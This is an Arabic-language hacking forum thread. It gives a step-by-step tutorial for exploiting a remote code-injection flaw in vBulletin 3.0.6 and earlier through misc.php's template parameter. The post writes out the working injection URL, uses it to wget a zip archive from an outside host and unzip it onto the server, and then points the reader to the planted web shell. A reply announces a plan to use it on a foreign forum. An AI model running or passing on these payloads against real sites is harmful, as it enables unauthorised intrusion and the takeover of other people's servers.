شرح أجدد ثغرة في منتديات vBulletin بالصور
 

بسم الله مع ثاني مشاركة أشرح لكم هذه الثغرة الخطيرة
نبدأ الشرح:::
أولا قم باختيار منتدى اصداره يكون 3.0.6 أو أقل
ثانياً ضع بعده هذا اللنك
misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=id
اذا طلع لك شاشة بيضاء يعني المنتدى غير مصاب بالثغرة أما إذا طلع لك :
[img]http://www.s4a.cc/up/images/vb1.GIF[/img]
فمعناه أن المنتدى مصاب بالثغرة
ثالثاً نقوم باستعراض مكاننا بالموقع بالأمر pwd فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=pwd
يطلع لك مثل الصورة:
[img]http://www.s4a.cc/up/images/vb2.GIF[/img]
نقوم بوضع الأمر wget [url]http://hkr-ksa.com/xp10/hitler.zip[/url]
فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=wget [url]http://hkr-ksa.com/xp10/hitler.zip[/url]
سيظهر لك شاشة بيضاء أعطيها مدة 5-10 ثواني ثم قم بوضع الأمر unzip hitler.zip فيصبح اللنك هكذا:
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=unzip hitler.zip
ستظهر لك مثل هذه الصورة:
[img]http://www.s4a.cc/up/images/vb3.GIF[/img]

مبرووك الآن اخترقت المنتدى رفعت الويب أدمن
الآن ادخل إلى :
[url]www.OOO.com/vb/khitler.php[/url]
واستمتع بالإختراق
* ملاحظة [url]www.OOO.com/vb[/url] استبدله بعنوان الموقع
---------------------
جميع الحقوق محفوظة لـX-jAyA-X
---------------------

رد : شرح أجدد ثغرة في منتديات vBulletin بالصور
 

شكرا لك


سأقوم بتطبيق ذلك على منتدى اجنبي واخبرك بالنتجية



لك تحياتي